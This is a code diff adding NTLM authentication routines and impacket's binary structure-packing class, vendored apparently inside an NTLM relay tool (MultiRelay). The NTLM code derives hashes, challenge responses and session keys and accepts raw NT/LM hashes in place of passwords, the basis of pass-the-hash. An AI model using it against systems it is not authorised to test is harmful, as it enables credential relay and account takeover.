+        ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey
+
+    return ntlmChallengeResponse, exportedSessionKey
+
+
+# NTLMv1 Algorithm
+
+def generateSessionKeyV1(password, lmhash, nthash):
+    hash = MD4.new()
+    hash.update(NTOWFv1(password, lmhash, nthash))
+    return hash.digest()
+
+
+def computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='',
+                          nthash='', use_ntlmv2=USE_NTLMv2):
+    if user == '' and password == '':
+        # Special case for anonymous authentication
+        lmResponse = ''
+        ntResponse = ''
+    else:
+        lmhash = LMOWFv1(password, lmhash, nthash)
+        nthash = NTOWFv1(password, lmhash, nthash)
+        if flags & NTLMSSP_NEGOTIATE_LM_KEY:
+           ntResponse = ''
+           lmResponse = get_ntlmv1_response(lmhash, serverChallenge)
+        elif flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+           md5 = hashlib.new('md5')
+           chall = (serverChallenge + clientChallenge)
+           md5.update(chall)
+           ntResponse = ntlmssp_DES_encrypt(nthash, md5.digest()[:8])
+           lmResponse = clientChallenge + b'\x00'*16
+        else:
+           ntResponse = get_ntlmv1_response(nthash,serverChallenge)
+           lmResponse = get_ntlmv1_response(lmhash, serverChallenge)
+   
+    sessionBaseKey = generateSessionKeyV1(password, lmhash, nthash)
+    return ntResponse, lmResponse, sessionBaseKey
+
+def compute_lmhash(password):
+    # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html)
+    password = password.upper()
+    lmhash  = __DES_block(b(password[:7]), KNOWN_DES_INPUT)
+    lmhash += __DES_block(b(password[7:14]), KNOWN_DES_INPUT)
+    return lmhash
+
+def NTOWFv1(password, lmhash = '', nthash=''):
+    if nthash != '':
+       return nthash
+    return compute_nthash(password)   
+
+def LMOWFv1(password, lmhash = '', nthash=''):
+    if lmhash != '':
+       return lmhash
+    return compute_lmhash(password)
+
+def compute_nthash(password):
+    # This is done according to Samba's encryption specification (docs/html/ENCRYPTION.html)
+    try:
+        password = str(password).encode('utf_16le')
+    except UnicodeDecodeError:
+        import sys
+        password = password.decode(sys.getfilesystemencoding()).encode('utf_16le')
+
+    hash = MD4.new()
+    hash.update(password)
+    return hash.digest()
+
+def get_ntlmv1_response(key, challenge):
+    return ntlmssp_DES_encrypt(key, challenge)
+
+# NTLMv2 Algorithm - as described in MS-NLMP Section 3.3.2
+
+# Crypto Stuff
+
+def MAC(flags, handle, signingKey, seqNum, message):
+   # [MS-NLMP] Section 3.4.4
+   # Returns the right messageSignature depending on the flags
+   messageSignature = NTLMMessageSignature(flags)
+   if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+       if flags & NTLMSSP_NEGOTIATE_KEY_EXCH:
+           messageSignature['Version'] = 1
+           messageSignature['Checksum'] = \
+           struct.unpack('<q', handle(hmac_md5(signingKey, struct.pack('<i', seqNum) + message)[:8]))[0]
+           messageSignature['SeqNum'] = seqNum
+           seqNum += 1
+       else:
+           messageSignature['Version'] = 1
+           messageSignature['Checksum'] = struct.unpack('<q',hmac_md5(signingKey, struct.pack('<i',seqNum)+message)[:8])[0]
+           messageSignature['SeqNum'] = seqNum
+           seqNum += 1
+   else:
+       messageSignature['Version'] = 1
+       messageSignature['Checksum'] = struct.pack('<I',binascii.crc32(message)& 0xFFFFFFFF)
+       messageSignature['RandomPad'] = 0
+       messageSignature['RandomPad'] = handle(struct.pack('<I',messageSignature['RandomPad']))
+       messageSignature['Checksum'] = struct.unpack('<I',handle(messageSignature['Checksum']))[0]
+       messageSignature['SeqNum'] = handle(b'\x00\x00\x00\x00')
+       messageSignature['SeqNum'] = struct.unpack('<I',messageSignature['SeqNum'])[0] ^ seqNum
+       messageSignature['RandomPad'] = 0
+       
+   return messageSignature
+
+def SEAL(flags, signingKey, sealingKey, messageToSign, messageToEncrypt, seqNum, handle):
+   sealedMessage = handle(messageToEncrypt)
+   signature = MAC(flags, handle, signingKey, seqNum, messageToSign)
+   return sealedMessage, signature
+
+def SIGN(flags, signingKey, message, seqNum, handle):
+   return MAC(flags, handle, signingKey, seqNum, message)
+
+def SIGNKEY(flags, randomSessionKey, mode = 'Client'):
+   if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+       if mode == 'Client':
+           md5 = hashlib.new('md5')
+           md5.update(randomSessionKey + b"session key to client-to-server signing key magic constant\x00")
+           signKey = md5.digest()
+       else:
+           md5 = hashlib.new('md5')
+           md5.update(randomSessionKey + b"session key to server-to-client signing key magic constant\x00")
+           signKey = md5.digest()
+   else:
+       signKey = None
+   return signKey
+
+def SEALKEY(flags, randomSessionKey, mode = 'Client'):
+   if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+       if flags & NTLMSSP_NEGOTIATE_128:
+           sealKey = randomSessionKey
+       elif flags & NTLMSSP_NEGOTIATE_56:
+           sealKey = randomSessionKey[:7]
+       else:
+           sealKey = randomSessionKey[:5]
+
+       if mode == 'Client':
+               md5 = hashlib.new('md5')
+               md5.update(sealKey + b'session key to client-to-server sealing key magic constant\x00')
+               sealKey = md5.digest()
+       else:
+               md5 = hashlib.new('md5')
+               md5.update(sealKey + b'session key to server-to-client sealing key magic constant\x00')
+               sealKey = md5.digest()
+
+   elif flags & NTLMSSP_NEGOTIATE_56:
+       sealKey = randomSessionKey[:7] + b'\xa0'
+   else:
+       sealKey = randomSessionKey[:5] + b'\xe5\x38\xb0'
+
+   return sealKey
+
+
+def generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey):
+   cipher = ARC4.new(keyExchangeKey)
+   cipher_encrypt = cipher.encrypt
+
+   sessionKey = cipher_encrypt(exportedSessionKey)
+   return sessionKey
+
+def KXKEY(flags, sessionBaseKey, lmChallengeResponse, serverChallenge, password, lmhash, nthash, use_ntlmv2 = USE_NTLMv2):
+   if use_ntlmv2:
+       return sessionBaseKey
+
+   if flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+       if flags & NTLMSSP_NEGOTIATE_NTLM:
+          keyExchangeKey = hmac_md5(sessionBaseKey, serverChallenge + lmChallengeResponse[:8])
+       else:
+          keyExchangeKey = sessionBaseKey
+   elif flags & NTLMSSP_NEGOTIATE_NTLM:
+       if flags & NTLMSSP_NEGOTIATE_LM_KEY:
+           keyExchangeKey = __DES_block(LMOWFv1(password, lmhash)[:7], lmChallengeResponse[:8]) + __DES_block(
+               LMOWFv1(password, lmhash)[7] + b'\xBD\xBD\xBD\xBD\xBD\xBD', lmChallengeResponse[:8])
+       elif flags & NTLMSSP_REQUEST_NON_NT_SESSION_KEY:
+          keyExchangeKey = LMOWFv1(password,lmhash)[:8] + b'\x00'*8
+       else:
+          keyExchangeKey = sessionBaseKey
+   else:
+       raise Exception("Can't create a valid KXKEY!")
+
+   return keyExchangeKey
+      
+def hmac_md5(key, data):
+    import hmac
+    h = hmac.new(key, digestmod=hashlib.md5)
+    h.update(data)
+    return h.digest()
+
+def NTOWFv2( user, password, domain, hash = ''):
+    if hash != '':
+       theHash = hash 
+    else:
+       theHash = compute_nthash(password)
+    return hmac_md5(theHash, user.upper().encode('utf-16le') + domain.encode('utf-16le'))
+
+def LMOWFv2( user, password, domain, lmhash = ''):
+    return NTOWFv2( user, password, domain, lmhash)
+
+
+def computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='',
+                          nthash='', use_ntlmv2=USE_NTLMv2):
+
+    responseServerVersion = b'\x01'
+    hiResponseServerVersion = b'\x01'
+    responseKeyNT = NTOWFv2(user, password, domain, nthash)
+
+    av_pairs = AV_PAIRS(serverName)
+    # In order to support SPN target name validation, we have to add this to the serverName av_pairs. Otherwise we will
+    # get access denied
+    # This is set at Local Security Policy -> Local Policies -> Security Options -> Server SPN target name validation
+    # level
+    if TEST_CASE is False:
+        av_pairs[NTLMSSP_AV_TARGET_NAME] = 'cifs/'.encode('utf-16le') + av_pairs[NTLMSSP_AV_HOSTNAME][1]
+        if av_pairs[NTLMSSP_AV_TIME] is not None:
+           aTime = av_pairs[NTLMSSP_AV_TIME][1]
+        else:
+           aTime = struct.pack('<q', (116444736000000000 + calendar.timegm(time.gmtime()) * 10000000) )
+           av_pairs[NTLMSSP_AV_TIME] = aTime
+        serverName = av_pairs.getData()
+    else:
+        aTime = b'\x00'*8
+
+    temp = responseServerVersion + hiResponseServerVersion + b'\x00' * 6 + aTime + clientChallenge + b'\x00' * 4 + \
+           serverName + b'\x00' * 4
+
+    ntProofStr = hmac_md5(responseKeyNT, serverChallenge + temp)
+
+    ntChallengeResponse = ntProofStr + temp
+    lmChallengeResponse = hmac_md5(responseKeyNT, serverChallenge + clientChallenge) + clientChallenge
+    sessionBaseKey = hmac_md5(responseKeyNT, ntProofStr)
+
+    if user == '' and password == '':
+        # Special case for anonymous authentication
+        ntChallengeResponse = ''
+        lmChallengeResponse = ''
+
+    return ntChallengeResponse, lmChallengeResponse, sessionBaseKey
+
+class NTLM_HTTP(object):
+    # Parent class for NTLM HTTP classes.
+    MSG_TYPE = None
+
+    @classmethod
+    def get_instace(cls,msg_64):
+        msg = None
+        msg_type = 0
+        if msg_64 != '':
+            msg = base64.b64decode(msg_64[5:]) # Remove the 'NTLM '
+            msg_type = ord(msg[8])
+    
+        for _cls in NTLM_HTTP.__subclasses__():
+            if msg_type == _cls.MSG_TYPE:
+                instance = _cls()
+                instance.fromString(msg)
+                return instance
+
+    
+class NTLM_HTTP_AuthRequired(NTLM_HTTP):
+    commonHdr = ()
+    # Message 0 means the first HTTP request e.g. 'GET /bla.png'
+    MSG_TYPE = 0
+
+    def fromString(self,data): 
+        pass
+
+
+class NTLM_HTTP_AuthNegotiate(NTLM_HTTP, NTLMAuthNegotiate):
+    commonHdr = ()
+    MSG_TYPE = 1
+
+    def __init__(self):
+        NTLMAuthNegotiate.__init__(self)
+
+
+class NTLM_HTTP_AuthChallengeResponse(NTLM_HTTP, NTLMAuthChallengeResponse):
+    commonHdr = ()
+    MSG_TYPE = 3
+
+    def __init__(self):
+        NTLMAuthChallengeResponse.__init__(self)

tools/MultiRelay/impacket-dev/impacket/structure.py

@@ -0,0 +1,658 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack, unpack, calcsize
+from six import b, PY3
+
+class Structure:
+    """ sublcasses can define commonHdr and/or structure.
+        each of them is an tuple of either two: (fieldName, format) or three: (fieldName, ':', class) fields.
+        [it can't be a dictionary, because order is important]
+        
+        where format specifies how the data in the field will be converted to/from bytes (string)
+        class is the class to use when unpacking ':' fields.
+
+        each field can only contain one value (or an array of values for *)
+           i.e. struct.pack('Hl',1,2) is valid, but format specifier 'Hl' is not (you must use 2 dfferent fields)
+
+        format specifiers:
+          specifiers from module pack can be used with the same format 
+          see struct.__doc__ (pack/unpack is finally called)
+            x       [padding byte]
+            c       [character]
+            b       [signed byte]
+            B       [unsigned byte]
+            h       [signed short]
+            H       [unsigned short]
+            l       [signed long]
+            L       [unsigned long]
+            i       [signed integer]
+            I       [unsigned integer]
+            q       [signed long long (quad)]
+            Q       [unsigned long long (quad)]
+            s       [string (array of chars), must be preceded with length in format specifier, padded with zeros]
+            p       [pascal string (includes byte count), must be preceded with length in format specifier, padded with zeros]
+            f       [float]
+            d       [double]
+            =       [native byte ordering, size and alignment]
+            @       [native byte ordering, standard size and alignment]
+            !       [network byte ordering]
+            <       [little endian]
+            >       [big endian]
+
+          usual printf like specifiers can be used (if started with %) 
+          [not recommended, there is no way to unpack this]
+
+            %08x    will output an 8 bytes hex
+            %s      will output a string
+            %s\\x00  will output a NUL terminated string
+            %d%d    will output 2 decimal digits (against the very same specification of Structure)
+            ...
+
+          some additional format specifiers:
+            :       just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned)
+            z       same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator)  [asciiz string]
+            u       same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string]
+            w       DCE-RPC/NDR string (it's a macro for [  '<L=(len(field)+1)/2','"\\x00\\x00\\x00\\x00','<L=(len(field)+1)/2',':' ]
+            ?-field length of field named 'field', formatted as specified with ? ('?' may be '!H' for example). The input value overrides the real length
+            ?1*?2   array of elements. Each formatted as '?2', the number of elements in the array is stored as specified by '?1' (?1 is optional, or can also be a constant (number), for unpacking)
+            'xxxx   literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
+            "xxxx   literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
+            _       will not pack the field. Accepts a third argument, which is an unpack code. See _Test_UnpackCode for an example
+            ?=packcode  will evaluate packcode in the context of the structure, and pack the result as specified by ?. Unpacking is made plain
+            ?&fieldname "Address of field fieldname".
+                        For packing it will simply pack the id() of fieldname. Or use 0 if fieldname doesn't exists.
+                        For unpacking, it's used to know weather fieldname has to be unpacked or not, i.e. by adding a & field you turn another field (fieldname) in an optional field.
+            
+    """
+    commonHdr = ()
+    structure = ()
+    debug = 0
+
+    def __init__(self, data = None, alignment = 0):
+        if not hasattr(self, 'alignment'):
+            self.alignment = alignment
+
+        self.fields    = {}
+        self.rawData   = data
+        if data is not None:
+            self.fromString(data)
+        else:
+            self.data = None
+
+    @classmethod
+    def fromFile(self, file):
+        answer = self()
+        answer.fromString(file.read(len(answer)))
+        return answer
+
+    def setAlignment(self, alignment):
+        self.alignment = alignment
+
+    def setData(self, data):
+        self.data = data
+
+    def packField(self, fieldName, format = None):
+        if self.debug:
+            print("packField( %s | %s )" % (fieldName, format))
+
+        if format is None:
+            format = self.formatForField(fieldName)
+
+        if fieldName in self.fields:
+            ans = self.pack(format, self.fields[fieldName], field = fieldName)
+        else:
+            ans = self.pack(format, None, field = fieldName)
+
+        if self.debug:
+            print("\tanswer %r" % ans)
+
+        return ans
+
+    def getData(self):
+        if self.data is not None:
+            return self.data
+        data = bytes()
+        for field in self.commonHdr+self.structure:
+            try:
+                data += self.packField(field[0], field[1])
+            except Exception as e:
+                if field[0] in self.fields:
+                    e.args += ("When packing field '%s | %s | %r' in %s" % (field[0], field[1], self[field[0]], self.__class__),)
+                else:
+                    e.args += ("When packing field '%s | %s' in %s" % (field[0], field[1], self.__class__),)
+                raise
+            if self.alignment:
+                if len(data) % self.alignment:
+                    data += (b'\x00'*self.alignment)[:-(len(data) % self.alignment)]
+            
+        #if len(data) % self.alignment: data += ('\x00'*self.alignment)[:-(len(data) % self.alignment)]
+        return data
+
+    def fromString(self, data):
+        self.rawData = data
+        for field in self.commonHdr+self.structure:
+            if self.debug:
+                print("fromString( %s | %s | %r )" % (field[0], field[1], data))
+            size = self.calcUnpackSize(field[1], data, field[0])
+            if self.debug:
+                print("  size = %d" % size)
+            dataClassOrCode = b
+            if len(field) > 2:
+                dataClassOrCode = field[2]
+            try:
+                self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
+            except Exception as e:
+                e.args += ("When unpacking field '%s | %s | %r[:%d]'" % (field[0], field[1], data, size),)
+                raise
+
+            size = self.calcPackSize(field[1], self[field[0]], field[0])
+            if self.alignment and size % self.alignment:
+                size += self.alignment - (size % self.alignment)
+            data = data[size:]
+
+        return self
+        
+    def __setitem__(self, key, value):
+        self.fields[key] = value
+        self.data = None        # force recompute
+
+    def __getitem__(self, key):
+        return self.fields[key]
+
+    def __delitem__(self, key):
+        del self.fields[key]
+        
+    def __str__(self):
+        return self.getData()
+
+    def __len__(self):
+        # XXX: improve
+        return len(self.getData())
+
+    def pack(self, format, data, field = None):
+        if self.debug:
+            print("  pack( %s | %r | %s)" %  (format, data, field))
+
+        if field:
+            addressField = self.findAddressFieldFor(field)
+            if (addressField is not None) and (data is None):
+                return b''
+
+        # void specifier
+        if format[:1] == '_':
+            return b''
+
+        # quote specifier
+        if format[:1] == "'" or format[:1] == '"':
+            return b(format[1:])
+
+        # code specifier
+        two = format.split('=')
+        if len(two) >= 2:
+            try:
+                return self.pack(two[0], data)
+            except:
+                fields = {'self':self}
+                fields.update(self.fields)
+                return self.pack(two[0], eval(two[1], {}, fields))
+
+        # address specifier
+        two = format.split('&')
+        if len(two) == 2:
+            try:
+                return self.pack(two[0], data)
+            except:
+                if (two[1] in self.fields) and (self[two[1]] is not None):
+                    return self.pack(two[0], id(self[two[1]]) & ((1<<(calcsize(two[0])*8))-1) )
+                else:
+                    return self.pack(two[0], 0)
+
+        # length specifier
+        two = format.split('-')
+        if len(two) == 2:
+            try:
+                return self.pack(two[0],data)
+            except:
+                return self.pack(two[0], self.calcPackFieldSize(two[1]))
+
+        # array specifier
+        two = format.split('*')
+        if len(two) == 2:
+            answer = bytes()
+            for each in data:
+                answer += self.pack(two[1], each)
+            if two[0]:
+                if two[0].isdigit():
+                    if int(two[0]) != len(data):
+                        raise Exception("Array field has a constant size, and it doesn't match the actual value")
+                else:
+                    return self.pack(two[0], len(data))+answer
+            return answer
+
+        # "printf" string specifier
+        if format[:1] == '%':
+            # format string like specifier
+            return b(format % data)
+
+        # asciiz specifier
+        if format[:1] == 'z':
+            if isinstance(data,bytes):
+                return data + b('\0')
+            return bytes(b(data)+b('\0'))
+
+        # unicode specifier
+        if format[:1] == 'u':
+            return bytes(data+b('\0\0') + (len(data) & 1 and b('\0') or b''))
+
+        # DCE-RPC/NDR string specifier
+        if format[:1] == 'w':
+            if len(data) == 0:
+                data = b('\0\0')
+            elif len(data) % 2:
+                data = b(data) + b('\0')
+            l = pack('<L', len(data)//2)
+            return b''.join([l, l, b('\0\0\0\0'), data])
+
+        if data is None:
+            raise Exception("Trying to pack None")
+        
+        # literal specifier
+        if format[:1] == ':':
+            if isinstance(data, Structure):
+                return data.getData()
+            # If we have an object that can serialize itself, go ahead
+            elif hasattr(data, "getData"):
+                return data.getData()
+            elif isinstance(data, int):
+                return bytes(data)
+            elif isinstance(data, bytes) is not True:
+                return bytes(b(data))
+            else:
+                return data
+
+        if format[-1:] == 's':
+            # Let's be sure we send the right type
+            if isinstance(data, bytes) or isinstance(data, bytearray):
+                return pack(format, data)
+            else:
+                return pack(format, b(data))
+
+        # struct like specifier
+        return pack(format, data)
+
+    def unpack(self, format, data, dataClassOrCode = b, field = None):
+        if self.debug:
+            print("  unpack( %s | %r )" %  (format, data))
+
+        if field:
+            addressField = self.findAddressFieldFor(field)
+            if addressField is not None:
+                if not self[addressField]:
+                    return
+
+        # void specifier
+        if format[:1] == '_':
+            if dataClassOrCode != b:
+                fields = {'self':self, 'inputDataLeft':data}
+                fields.update(self.fields)
+                return eval(dataClassOrCode, {}, fields)
+            else:
+                return None
+
+        # quote specifier
+        if format[:1] == "'" or format[:1] == '"':
+            answer = format[1:]
+            if b(answer) != data:
+                raise Exception("Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer))
+            return answer
+
+        # address specifier
+        two = format.split('&')
+        if len(two) == 2:
+            return self.unpack(two[0],data)
+
+        # code specifier
+        two = format.split('=')
+        if len(two) >= 2:
+            return self.unpack(two[0],data)
+
+        # length specifier
+        two = format.split('-')
+        if len(two) == 2:
+            return self.unpack(two[0],data)
+
+        # array specifier
+        two = format.split('*')
+        if len(two) == 2:
+            answer = []
+            sofar = 0
+            if two[0].isdigit():
+                number = int(two[0])
+            elif two[0]:
+                sofar += self.calcUnpackSize(two[0], data)
+                number = self.unpack(two[0], data[:sofar])
+            else:
+                number = -1
+
+            while number and sofar < len(data):
+                nsofar = sofar + self.calcUnpackSize(two[1],data[sofar:])
+                answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode))
+                number -= 1
+                sofar = nsofar
+            return answer
+
+        # "printf" string specifier
+        if format[:1] == '%':
+            # format string like specifier
+            return format % data
+
+        # asciiz specifier
+        if format == 'z':
+            if data[-1:] != b('\x00'):
+                raise Exception("%s 'z' field is not NUL terminated: %r" % (field, data))
+            if PY3:
+                return data[:-1].decode('latin-1')
+            else:
+                return data[:-1]
+
+        # unicode specifier
+        if format == 'u':
+            if data[-2:] != b('\x00\x00'):
+                raise Exception("%s 'u' field is not NUL-NUL terminated: %r" % (field, data))
+            return data[:-2] # remove trailing NUL
+
+        # DCE-RPC/NDR string specifier
+        if format == 'w':
+            l = unpack('<L', data[:4])[0]
+            return data[12:12+l*2]
+
+        # literal specifier
+        if format == ':':
+            if isinstance(data, bytes) and dataClassOrCode is b:
+                return data
+            return dataClassOrCode(data)
+
+        # struct like specifier
+        return unpack(format, data)[0]
+
+    def calcPackSize(self, format, data, field = None):
+#        # print "  calcPackSize  %s:%r" %  (format, data)
+        if field:
+            addressField = self.findAddressFieldFor(field)
+            if addressField is not None:
+                if not self[addressField]:
+                    return 0
+
+        # void specifier
+        if format[:1] == '_':
+            return 0
+
+        # quote specifier
+        if format[:1] == "'" or format[:1] == '"':
+            return len(format)-1
+
+        # address specifier
+        two = format.split('&')
+        if len(two) == 2:
+            return self.calcPackSize(two[0], data)
+
+        # code specifier
+        two = format.split('=')
+        if len(two) >= 2:
+            return self.calcPackSize(two[0], data)
+
+        # length specifier
+        two = format.split('-')
+        if len(two) == 2:
+            return self.calcPackSize(two[0], data)
+
+        # array specifier
+        two = format.split('*')
+        if len(two) == 2:
+            answer = 0
+            if two[0].isdigit():
+                    if int(two[0]) != len(data):
+                        raise Exception("Array field has a constant size, and it doesn't match the actual value")
+            elif two[0]:
+                answer += self.calcPackSize(two[0], len(data))
+
+            for each in data:
+                answer += self.calcPackSize(two[1], each)
+            return answer
+
+        # "printf" string specifier
+        if format[:1] == '%':
+            # format string like specifier
+            return len(format % data)
+
+        # asciiz specifier
+        if format[:1] == 'z':
+            return len(data)+1
+
+        # asciiz specifier
+        if format[:1] == 'u':
+            l = len(data)
+            return l + (l & 1 and 3 or 2)
+
+        # DCE-RPC/NDR string specifier
+        if format[:1] == 'w':
+            l = len(data)
+            return 12+l+l % 2
+
+        # literal specifier
+        if format[:1] == ':':
+            return len(data)
+
+        # struct like specifier
+        return calcsize(format)
+
+    def calcUnpackSize(self, format, data, field = None):
+        if self.debug:
+            print("  calcUnpackSize( %s | %s | %r)" %  (field, format, data))
+
+        # void specifier
+        if format[:1] == '_':
+            return 0
+
+        addressField = self.findAddressFieldFor(field)
+        if addressField is not None:
+            if not self[addressField]:
+                return 0
+
+        try:
+            lengthField = self.findLengthFieldFor(field)
+            return int(self[lengthField])
+        except Exception:
+            pass
+
+        # XXX: Try to match to actual values, raise if no match
+        
+        # quote specifier
+        if format[:1] == "'" or format[:1] == '"':
+            return len(format)-1
+
+        # address specifier
+        two = format.split('&')
+        if len(two) == 2:
+            return self.calcUnpackSize(two[0], data)
+
+        # code specifier
+        two = format.split('=')
+        if len(two) >= 2:
+            return self.calcUnpackSize(two[0], data)
+
+        # length specifier
+        two = format.split('-')
+        if len(two) == 2:
+            return self.calcUnpackSize(two[0], data)
+
+        # array specifier
+        two = format.split('*')
+        if len(two) == 2:
+            answer = 0
+            if two[0]:
+                if two[0].isdigit():
+                    number = int(two[0])
+                else:
+                    answer += self.calcUnpackSize(two[0], data)
+                    number = self.unpack(two[0], data[:answer])
+
+                while number:
+                    number -= 1
+                    answer += self.calcUnpackSize(two[1], data[answer:])
+            else:
+                while answer < len(data):
+                    answer += self.calcUnpackSize(two[1], data[answer:])
+            return answer
+
+        # "printf" string specifier
+        if format[:1] == '%':
+            raise Exception("Can't guess the size of a printf like specifier for unpacking")
+
+        # asciiz specifier
+        if format[:1] == 'z':
+            return data.index(b('\x00'))+1
+
+        # asciiz specifier
+        if format[:1] == 'u':
+            l = data.index(b('\x00\x00'))
+            return l + (l & 1 and 3 or 2)
+
+        # DCE-RPC/NDR string specifier
+        if format[:1] == 'w':
+            l = unpack('<L', data[:4])[0]
+            return 12+l*2
+
+        # literal specifier
+        if format[:1] == ':':
+            return len(data)
+
+        # struct like specifier
+        return calcsize(format)
+
+    def calcPackFieldSize(self, fieldName, format = None):
+        if format is None:
+            format = self.formatForField(fieldName)
+
+        return self.calcPackSize(format, self[fieldName])
+
+    def formatForField(self, fieldName):
+        for field in self.commonHdr+self.structure:
+            if field[0] == fieldName:
+                return field[1]
+        raise Exception("Field %s not found" % fieldName)
+
+    def findAddressFieldFor(self, fieldName):
+        descriptor = '&%s' % fieldName
+        l = len(descriptor)
+        for field in self.commonHdr+self.structure:
+            if field[1][-l:] == descriptor:
+                return field[0]
+        return None
+        
+    def findLengthFieldFor(self, fieldName):
+        descriptor = '-%s' % fieldName
+        l = len(descriptor)
+        for field in self.commonHdr+self.structure:
+            if field[1][-l:] == descriptor:
+                return field[0]
+        return None
+        
+    def zeroValue(self, format):
+        two = format.split('*')
+        if len(two) == 2:
+            if two[0].isdigit():
+                return (self.zeroValue(two[1]),)*int(two[0])
+                        
+        if not format.find('*') == -1:
+            return ()
+        if 's' in format:
+            return b''
+        if format in ['z',':','u']:
+            return b''
+        if format == 'w':
+            return b('\x00\x00')
+
+        return 0
+
+    def clear(self):
+        for field in self.commonHdr + self.structure:
+            self[field[0]] = self.zeroValue(field[1])
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        ind = ' '*indent
+        print("\n%s" % msg)
+        fixedFields = []
+        for field in self.commonHdr+self.structure:
+            i = field[0] 
+            if i in self.fields:
+                fixedFields.append(i)
+                if isinstance(self[i], Structure):
+                    self[i].dump('%s%s:{' % (ind,i), indent = indent + 4)
+                    print("%s}" % ind)
+                else:
+                    print("%s%s: {%r}" % (ind,i,self[i]))
+        # Do we have remaining fields not defined in the structures? let's 
+        # print them
+        remainingFields = list(set(self.fields) - set(fixedFields))
+        for i in remainingFields:
+            if isinstance(self[i], Structure):
+                self[i].dump('%s%s:{' % (ind,i), indent = indent + 4)
+                print("%s}" % ind)
+            else:
+                print("%s%s: {%r}" % (ind,i,self[i]))
+
+def pretty_print(x):
+    if chr(x) in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ ':
+       return chr(x)
+    else:
+       return u'.'
+
+def hexdump(data, indent = ''):
+    if data is None:
+        return
+    if isinstance(data, int):
+        data = str(data).encode('utf-8')
+    x=bytearray(data)
+    strLen = len(x)
+    i = 0
+    while i < strLen:
+        line = " %s%04x   " % (indent, i)
+        for j in range(16):
+            if i+j < strLen:
+                line += "%02X " % x[i+j]
+            else:
+                line += u"   "
+            if j%16 == 7:
+                line += " "
+        line += "  "
+        line += ''.join(pretty_print(x) for x in x[i:i+16] )
+        print (line)
+        i += 16
+
+def parse_bitmask(dict, value):
+    ret = ''
+    
+    for i in range(0, 31):
+        flag = 1 << i
+
+        if value & flag == 0:
+            continue
+
+        if flag in dict:
+            ret += '%s | ' % dict[flag]
+        else:
+            ret += "0x%.8X | " % flag
+
+    if len(ret) == 0:
+        return '0'
+    else:
+        return ret[:-3]